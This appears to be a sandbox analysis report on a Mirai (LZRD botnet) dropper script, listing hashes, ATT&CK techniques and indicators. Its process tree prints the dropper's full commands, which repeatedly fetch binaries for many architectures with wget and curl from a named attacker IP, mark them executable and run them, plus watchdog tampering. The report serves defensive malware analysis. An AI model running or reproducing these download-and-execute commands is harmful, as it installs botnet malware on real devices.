mirai | fc597840cd197e2d00756f3780a0bae80eb69efe948afd344603b6f7de911945

Analysis

max time kernel
147s
max time network
148s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
23-12-2024 01:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
Size

2KB
MD5

4e3d079076dbd0da4d36211e359e7c90
SHA1

c78fc85b3cb983b5f6da054337221b744ffce6f2
SHA256

21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c
SHA512

85a322f9c2d9cae35021d896ca50f254b49354d2819f77396a97a9d41a544d8662ec0cdd38475884b9bab02f9247c9ed637fa9caa26d4669b8f5e32a739ec78b

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
895	chmod
823	chmod
850	chmod
861	chmod
889	chmod
829	chmod
844	chmod
877	chmod
912	chmod
838	chmod
871	chmod
883	chmod
856	chmod
901	chmod
906	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Space	824	Space
/tmp/Space	830	Space
/tmp/Space	839	Space
/tmp/Space	845	Space
/tmp/Space	851	Space
/tmp/Space	857	Space
/tmp/Space	862	Space
/tmp/Space	872	Space
/tmp/Space	878	Space
/tmp/Space	884	Space
/tmp/Space	890	Space
/tmp/Space	896	Space
/tmp/Space	902	Space
/tmp/Space	907	Space
/tmp/Space	913	Space

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx
behavioral4/files/fstream-7.dat	upx
behavioral4/files/fstream-8.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/110/status	Space
File opened for reading	/proc/230/status	Space
File opened for reading	/proc/326/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/14/status	Space
File opened for reading	/proc/36/status	Space
File opened for reading	/proc/20/status	Space
File opened for reading	/proc/75/status	Space
File opened for reading	/proc/76/status	Space
File opened for reading	/proc/380/status	Space
File opened for reading	/proc/432/status	Space
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/12/status	Space
File opened for reading	/proc/5/status	Space
File opened for reading	/proc/671/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/24/status	Space
File opened for reading	/proc/151/status	Space
File opened for reading	/proc/721/status	Space
File opened for reading	/proc/11/status	Space
File opened for reading	/proc/21/status	Space
File opened for reading	/proc/7/status	Space
File opened for reading	/proc/9/status	Space
File opened for reading	/proc/10/status	Space
File opened for reading	/proc/16/status	Space
File opened for reading	/proc/71/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/2/status	Space
File opened for reading	/proc/675/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/6/status	Space
File opened for reading	/proc/81/status	Space
File opened for reading	/proc/329/status	Space
File opened for reading	/proc/717/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/4/status	Space
File opened for reading	/proc/72/status	Space
File opened for reading	/proc/383/status	Space
File opened for reading	/proc/714/status	Space
File opened for reading	/proc/1/status	Space
File opened for reading	/proc/15/status	Space
File opened for reading	/proc/19/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/678/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/13/status	Space
File opened for reading	/proc/78/status	Space
File opened for reading	/proc/245/status	Space
File opened for reading	/proc/70/status	Space
File opened for reading	/proc/73/status	Space
File opened for reading	/proc/74/status	Space
File opened for reading	/proc/331/status	Space
File opened for reading	/proc/677/status	Space
File opened for reading	/proc/3/status	Space
File opened for reading	/proc/17/status	Space
File opened for reading	/proc/37/status	Space
File opened for reading	/proc/333/status	Space
File opened for reading	/proc/334/status	Space

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
854	curl
855	cat
847	wget
848	curl
849	cat
853	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Space.arm7	wget
File opened for modification	/tmp/Space.ppc	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Space.x86_64	wget
File opened for modification	/tmp/Space.i686	curl
File opened for modification	/tmp/Space.mpsl	curl
File opened for modification	/tmp/Space.sparc	curl
File opened for modification	/tmp/Space.sh4	curl
File opened for modification	/tmp/Space.i686	wget
File opened for modification	/tmp/Space.arm	wget
File opened for modification	/tmp/Space.arm6	wget
File opened for modification	/tmp/Space.ppc	wget
File opened for modification	/tmp/Space.arm6	curl
File opened for modification	/tmp/Space.m68k	curl
File opened for modification	/tmp/Space	21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
File opened for modification	/tmp/Space.x86	curl
File opened for modification	/tmp/Space.mpsl	wget
File opened for modification	/tmp/Space.arm	curl
File opened for modification	/tmp/Space.arc	curl
File opened for modification	/tmp/Space.arm5	wget
File opened for modification	/tmp/Space.sh4	wget
File opened for modification	/tmp/Space.arc	wget
File opened for modification	/tmp/Space.x86	wget
File opened for modification	/tmp/Space.x86_64	curl
File opened for modification	/tmp/Space.arm7	curl
File opened for modification	/tmp/Space.m68k	wget
File opened for modification	/tmp/Space.mips	wget
File opened for modification	/tmp/Space.mips	curl
File opened for modification	/tmp/Space.mips64	curl
File opened for modification	/tmp/Space.arm5	curl

/tmp/21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
/tmp/21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
1⤵
- Writes file to tmp directory
PID:717
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:720
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:727
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/cat
  cat Space.arc
  2⤵
  PID:822
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-xUczsp
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:824
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:826
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/cat
  cat Space.x86
  2⤵
  PID:828
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-xUczsp
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:830
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:832
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:833
- /bin/cat
  cat Space.x86_64
  2⤵
  PID:837
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:839
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:841
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:842
- /bin/cat
  cat Space.i686
  2⤵
  PID:843
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:845
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:847
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:848
- /bin/cat
  cat Space.mips
  2⤵
  - System Network Configuration Discovery
  PID:849
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:850
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:851
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:853
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.mips64
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:854
- /bin/cat
  cat Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:855
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:857
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.mpsl
  2⤵
  - Writes file to tmp directory
  PID:858
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:859
- /bin/cat
  cat Space.mpsl
  2⤵
  PID:860
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:862
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm
  2⤵
  - Writes file to tmp directory
  PID:868
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/cat
  cat Space.arm
  2⤵
  PID:870
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:872
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm5
  2⤵
  - Writes file to tmp directory
  PID:874
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:875
- /bin/cat
  cat Space.arm5
  2⤵
  PID:876
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:878
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm6
  2⤵
  - Writes file to tmp directory
  PID:880
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/cat
  cat Space.arm6
  2⤵
  PID:882
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:884
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm7
  2⤵
  - Writes file to tmp directory
  PID:886
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm7
  2⤵
  - Writes file to tmp directory
  PID:887
- /bin/cat
  cat Space.arm7
  2⤵
  PID:888
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:890
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.ppc
  2⤵
  - Writes file to tmp directory
  PID:892
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/cat
  cat Space.ppc
  2⤵
  PID:894
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:896
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.sparc
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.sparc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/cat
  cat Space.sparc
  2⤵
  PID:900
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:902
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.m68k
  2⤵
  - Writes file to tmp directory
  PID:903
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:904
- /bin/cat
  cat Space.m68k
  2⤵
  PID:905
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:906
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:907
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.sh4
  2⤵
  - Writes file to tmp directory
  PID:909
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:910
- /bin/cat
  cat Space.sh4
  2⤵
  PID:911
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:913

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Space

Filesize
34KB

MD5
f66071f9e603dd7b96793058e206b45c

SHA1
f90eaf59e5a2c5030450de5b1f12a72a8ec8f256

SHA256
8b8facc7fb2d6cd6f278ea77711c41970dcdff8a367d2d04a2221fd4286ffb45

SHA512
d5d307f49f255d8f2e36027cdb5b0b7171f83d99147fb1d074bdb64f4c65fa19a7af2556508e0a317a9a4e0df5bd005b5d1b3396282647d9672b12d916d3fc88

Download Submit
/tmp/Space

Filesize
36KB

MD5
3c733927caaa196b216421abb32e2632

SHA1
0c2443725d846b98d0f43fd04d914fc9f0848595

SHA256
5c26d99fcb4734a9fa1e742d0a2b79de476ad150afd2ab87212766a458eb3475

SHA512
531651740555a3e4291b9de2a326a4dc5e69088e64264827f1a1f32be8882db930f183e8a145967e8d0976119e3e3d21ff95b9fdd80f3a20b63b801b3d790f08

Download Submit
/tmp/Space

Filesize
35KB

MD5
69bb2976de3feee44a259aba3d6e6339

SHA1
5ae7aa7d99a2ec82de2d9a9da57a9acd5176b939

SHA256
fb5e5e67d08d25421f3d1acfea212d860a41c97ffcbd3d30094362cccaaf9d76

SHA512
c3292376c62e324d9b8e6773a78d5d0215feef9f2173f974f5e8ee4bf024aee817e4f6c497a38d285cb00383e28200983fd2be063b384a77d8f7d8c1dfc3388f

Download Submit
/tmp/Space

Filesize
37KB

MD5
a010ddf965c0b627abe851fced83e6fe

SHA1
5fe8eabdce3d9ef71ff19a7fc109b841a958e328

SHA256
3b6b160ecfbb8c22f91a08708aa0a73917ddcfbf15c628af30e3c34257825aae

SHA512
d432b1469b70044a3ca0b61ab8b4294ce89fb53e7991fa14c8b7c06728a46ae81cad82f401dd87ca2e286e2e0e0669380c7cda0a534525cd0831aa2d9d1cdf9c

Download Submit
/tmp/Space

Filesize
82KB

MD5
ee5d58bab852ebdb4db18fe5941b7b11

SHA1
48d40ff4c228571b6a704578cdd5e8505fe7e883

SHA256
2869e0d7e90b1488b774960b8d92a35cb219b5b20de58f3c2b4f7798c4b0d558

SHA512
e58ffb21af892d20ac9655bfa024e10bcdc6e694416988e5bd30004e9c3018141e1d9a3e972096a0d68a01aa5a610f897e8ecd60f8807cac41d903460a67f615

Download Submit
/tmp/Space.arc

Filesize
113KB

MD5
0d7dfd4bb7805b98857a7d2f0a6c736e

SHA1
3dd2688150dae67b47e3a4da289f98f2fc6b3dae

SHA256
fc713acedb272a695f5377591a7110d2061697ef7b5de6852e1132040597a39b

SHA512
03858c754d6469066b8b7b21f8765c24706209e0d9acc3b014014c5a6abd8738f4722d6f2403f85678822021b568834186c6e346dd96b25139c7e4572d3c1899

Download Submit
/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads